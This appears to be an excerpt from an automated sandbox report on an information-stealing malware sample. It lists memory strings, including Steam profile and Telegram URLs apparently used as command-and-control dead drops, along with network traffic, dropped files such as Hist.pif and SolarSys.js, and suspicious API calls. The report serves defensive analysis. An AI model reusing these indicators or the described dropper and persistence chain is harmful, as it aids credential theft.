                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: https://d.symcb.com/cps0%
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: https://d.symcb.com/rpa0
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: https://d.symcb.com/rpa0.
                    Source: GCFIIE.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: GCFIIE.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: GCFIIE.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: HCFBKK.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://mozilla.org0/
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/P
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199735694209
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: Hist.pif, 0000000B.00000003.2554923628.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3071880949.000000000149B000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555177595.000000000463F000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2554949475.00000000046C3000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199735694209
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199735694209/badges
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199735694209/inventory/
                    Source: Hist.pif, 0000000B.00000003.2554923628.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555177595.000000000463F000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2554949475.00000000046C3000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199735694209fr-0Mozilla/5.0
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: AAAAKJ.11.drString found in binary or memory: https://support.mozilla.org
                    Source: AAAAKJ.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: AAAAKJ.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                    Source: Hist.pif, 0000000B.00000003.2554923628.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555177595.000000000463F000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2554949475.00000000046C3000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/puffclou
                    Source: Hist.pif, 0000000B.00000003.2554923628.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555177595.000000000463F000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2554949475.00000000046C3000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/puffclouhellosqlt.dllsqlite3.dll
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: GCFIIE.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: mg9LPWGtPB.exe, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/03
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: GCFIIE.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: AAAAKJ.11.drString found in binary or memory: https://www.mozilla.org
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3077545139.000000000C55F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: AAAAKJ.11.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3077545139.000000000C55F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: AAAAKJ.11.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3077545139.000000000C55F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: Hist.pif, 0000000B.00000003.2902325535.0000000012DBD000.00000004.00000800.00020000.00000000.sdmp, AAAAKJ.11.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                    Source: AAAAKJ.11.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Hist.pif, 0000000B.00000003.2902325535.0000000012DBD000.00000004.00000800.00020000.00000000.sdmp, AAAAKJ.11.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3077545139.000000000C55F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                    Source: Hist.pif, 0000000B.00000003.2902325535.0000000012DBD000.00000004.00000800.00020000.00000000.sdmp, AAAAKJ.11.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64937 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64943 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64947 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64934
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64952 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64936
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64935
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64938
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64937
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64956 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64938 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64944 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64940 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64948 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64945
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64944
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64947
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64955 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64949
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64948
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64951 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64934 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64959 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64941
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64940
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64943
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64941 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64945 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64949 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64956
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64955
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64954 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64958
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64950 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64959
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64935 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64958 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64950
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64952
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64951
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64954
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64953
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64942 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64946 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64953 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64936 -> 443
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.5:64934 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 65.109.241.221:443 -> 192.168.2.5:64935 version: TLS 1.2
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00094614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00094614
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003B4614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,38_2_003B4614
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00094416 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00094416
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000ACEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_000ACEDF
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003CCEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,38_2_003CCEDF

                    System Summary

                    barindex
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Wscript called in batch mode (surpress errors)
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js"
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000840C1: CreateFileW,DeviceIoControl,CloseHandle,11_2_000840C1
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00078D11 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00078D11
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000855E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_000855E5
